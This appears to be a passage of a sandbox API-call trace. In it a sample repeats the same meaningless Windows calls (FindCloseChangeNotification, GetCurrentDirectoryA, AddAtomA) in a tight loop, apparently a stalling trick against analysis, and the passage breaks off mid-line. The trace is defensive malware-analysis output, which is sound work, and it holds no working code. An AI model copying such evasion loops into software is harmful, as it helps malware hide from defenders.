[0080.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.845] AddAtomA (lpString=0x0) returned 0x0 [0080.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.845] AddAtomA (lpString=0x0) returned 0x0 [0080.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.846] AddAtomA (lpString=0x0) returned 0x0 [0080.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.846] AddAtomA (lpString=0x0) returned 0x0 [0080.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.846] AddAtomA (lpString=0x0) returned 0x0 [0080.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.846] AddAtomA (lpString=0x0) returned 0x0 [0080.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.846] AddAtomA (lpString=0x0) returned 0x0 [0080.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.846] AddAtomA (lpString=0x0) returned 0x0 [0080.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.847] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.847] AddAtomA (lpString=0x0) returned 0x0 [0080.847] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.847] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.847] AddAtomA (lpString=0x0) returned 0x0 [0080.847] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.847] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.847] AddAtomA (lpString=0x0) returned 0x0 [0080.847] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.847] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.847] AddAtomA (lpString=0x0) returned 0x0 [0080.847] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.847] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.847] AddAtomA (lpString=0x0) returned 0x0 [0080.847] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.847] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.847] AddAtomA (lpString=0x0) returned 0x0 [0080.847] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.847] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.848] AddAtomA (lpString=0x0) returned 0x0 [0080.848] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.848] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.848] AddAtomA (lpString=0x0) returned 0x0 [0080.848] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.848] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.848] AddAtomA (lpString=0x0) returned 0x0 [0080.848] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.848] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.848] AddAtomA (lpString=0x0) returned 0x0 [0080.848] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.848] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.848] AddAtomA (lpString=0x0) returned 0x0 [0080.848] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.849] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.849] AddAtomA (lpString=0x0) returned 0x0 [0080.849] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.849] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.849] AddAtomA (lpString=0x0) returned 0x0 [0080.849] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.849] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.849] AddAtomA (lpString=0x0) returned 0x0 [0080.849] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.849] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.849] AddAtomA (lpString=0x0) returned 0x0 [0080.849] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.849] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.849] AddAtomA (lpString=0x0) returned 0x0 [0080.850] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.850] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.850] AddAtomA (lpString=0x0) returned 0x0 [0080.850] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.850] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.850] AddAtomA (lpString=0x0) returned 0x0 [0080.850] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.850] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.850] AddAtomA (lpString=0x0) returned 0x0 [0080.850] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.850] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.850] AddAtomA (lpString=0x0) returned 0x0 [0080.850] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.850] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.851] AddAtomA (lpString=0x0) returned 0x0 [0080.851] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.851] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.851] AddAtomA (lpString=0x0) returned 0x0 [0080.851] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.851] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.851] AddAtomA (lpString=0x0) returned 0x0 [0080.851] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.851] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.851] AddAtomA (lpString=0x0) returned 0x0 [0080.851] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.851] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.851] AddAtomA (lpString=0x0) returned 0x0 [0080.851] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.851] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.851] AddAtomA (lpString=0x0) returned 0x0 [0080.851] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.852] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.852] AddAtomA (lpString=0x0) returned 0x0 [0080.852] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.852] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.852] AddAtomA (lpString=0x0) returned 0x0 [0080.852] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.852] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.852] AddAtomA (lpString=0x0) returned 0x0 [0080.852] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.852] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.852] AddAtomA (lpString=0x0) returned 0x0 [0080.852] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.852] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.852] AddAtomA (lpString=0x0) returned 0x0 [0080.852] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.852] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.853] AddAtomA (lpString=0x0) returned 0x0 [0080.853] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.853] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.853] AddAtomA (lpString=0x0) returned 0x0 [0080.853] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.853] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.853] AddAtomA (lpString=0x0) returned 0x0 [0080.853] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.853] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.853] AddAtomA (lpString=0x0) returned 0x0 [0080.853] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.853] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.853] AddAtomA (lpString=0x0) returned 0x0 [0080.853] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.853] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.853] AddAtomA (lpString=0x0) returned 0x0 [0080.853] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.853] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.853] AddAtomA (lpString=0x0) returned 0x0 [0080.854] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.854] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.854] AddAtomA (lpString=0x0) returned 0x0 [0080.854] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.854] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.854] AddAtomA (lpString=0x0) returned 0x0 [0080.854] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.854] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.854] AddAtomA (lpString=0x0) returned 0x0 [0080.854] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.854] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.854] AddAtomA (lpString=0x0) returned 0x0 [0080.854] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.854] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.854] AddAtomA (lpString=0x0) returned 0x0 [0080.854] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.854] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.854] AddAtomA (lpString=0x0) returned 0x0 [0080.854] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.855] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.855] AddAtomA (lpString=0x0) returned 0x0 [0080.855] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.855] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.855] AddAtomA (lpString=0x0) returned 0x0 [0080.855] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.855] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.855] AddAtomA (lpString=0x0) returned 0x0 [0080.855] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.855] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.855] AddAtomA (lpString=0x0) returned 0x0 [0080.855] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.855] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.855] AddAtomA (lpString=0x0) returned 0x0 [0080.856] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.856] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.856] AddAtomA (lpString=0x0) returned 0x0 [0080.856] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.856] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.856] AddAtomA (lpString=0x0) returned 0x0 [0080.856] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.856] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.856] AddAtomA (lpString=0x0) returned 0x0 [0080.856] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.856] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.856] AddAtomA (lpString=0x0) returned 0x0 [0080.856] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.856] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.856] AddAtomA (lpString=0x0) returned 0x0 [0080.856] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.856] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.857] AddAtomA (lpString=0x0) returned 0x0 [0080.857] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.857] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.857] AddAtomA (lpString=0x0) returned 0x0 [0080.857] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.857] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.857] AddAtomA (lpString=0x0) returned 0x0 [0080.857] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.857] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.857] AddAtomA (lpString=0x0) returned 0x0 [0080.857] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.857] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.857] AddAtomA (lpString=0x0) returned 0x0 [0080.857] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.857] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.857] AddAtomA (lpString=0x0) returned 0x0 [0080.857] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.857] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.857] AddAtomA (lpString=0x0) returned 0x0 [0080.857] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.857] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.858] AddAtomA (lpString=0x0) returned 0x0 [0080.858] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.858] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.858] AddAtomA (lpString=0x0) returned 0x0 [0080.858] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.858] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.858] AddAtomA (lpString=0x0) returned 0x0 [0080.858] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.858] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.858] AddAtomA (lpString=0x0) returned 0x0 [0080.858] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.858] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.858] AddAtomA (lpString=0x0) returned 0x0 [0080.858] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.858] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.858] AddAtomA (lpString=0x0) returned 0x0 [0080.858] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.859] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.859] AddAtomA (lpString=0x0) returned 0x0 [0080.859] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.860] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.860] AddAtomA (lpString=0x0) returned 0x0 [0080.860] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.860] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.860] AddAtomA (lpString=0x0) returned 0x0 [0080.860] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.860] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.860] AddAtomA (lpString=0x0) returned 0x0 [0080.860] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.860] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.860] AddAtomA (lpString=0x0) returned 0x0 [0080.860] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.860] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.860] AddAtomA (lpString=0x0) returned 0x0 [0080.860] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.860] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.860] AddAtomA (lpString=0x0) returned 0x0 [0080.860] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.860] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.860] AddAtomA (lpString=0x0) returned 0x0 [0080.861] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.861] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.861] AddAtomA (lpString=0x0) returned 0x0 [0080.861] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.861] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.861] AddAtomA (lpString=0x0) returned 0x0 [0080.861] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.861] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.861] AddAtomA (lpString=0x0) returned 0x0 [0080.861] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.861] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.861] AddAtomA (lpString=0x0) returned 0x0 [0080.861] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.861] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.861] AddAtomA (lpString=0x0) returned 0x0 [0080.861] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.861] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.861] AddAtomA (lpString=0x0) returned 0x0 [0080.861] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.861] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.861] AddAtomA (lpString=0x0) returned 0x0 [0080.862] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.862] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.862] AddAtomA (lpString=0x0) returned 0x0 [0080.862] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.862] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.862] AddAtomA (lpString=0x0) returned 0x0 [0080.862] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.862] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.862] AddAtomA (lpString=0x0) returned 0x0 [0080.862] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.862] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.862] AddAtomA (lpString=0x0) returned 0x0 [0080.862] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.862] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.862] AddAtomA (lpString=0x0) returned 0x0 [0080.862] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.862] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.862] AddAtomA (lpString=0x0) returned 0x0 [0080.862] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.862] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.862] AddAtomA (lpString=0x0) returned 0x0 [0080.862] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.862] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.862] AddAtomA (lpString=0x0) returned 0x0 [0080.862] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.863] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.863] AddAtomA (lpString=0x0) returned 0x0 [0080.863] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.863] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.863] AddAtomA (lpString=0x0) returned 0x0 [0080.863] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.863] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.863] AddAtomA (lpString=0x0) returned 0x0 [0080.863] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.863] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.863] AddAtomA (lpString=0x0) returned 0x0 [0080.863] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.863] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.863] AddAtomA (lpString=0x0) returned 0x0 [0080.863] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.863] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.863] AddAtomA (lpString=0x0) returned 0x0 [0080.863] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.863] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.863] AddAtomA (lpString=0x0) returned 0x0 [0080.863] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.863] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.864] AddAtomA (lpString=0x0) returned 0x0 [0080.864] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.864] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.864] AddAtomA (lpString=0x0) returned 0x0 [0080.864] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.864] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.864] AddAtomA (lpString=0x0) returned 0x0 [0080.864] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.864] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.864] AddAtomA (lpString=0x0) returned 0x0 [0080.864] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.864] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.864] AddAtomA (lpString=0x0) returned 0x0 [0080.864] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.864] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.864] AddAtomA (lpString=0x0) returned 0x0 [0080.864] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.864] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.864] AddAtomA 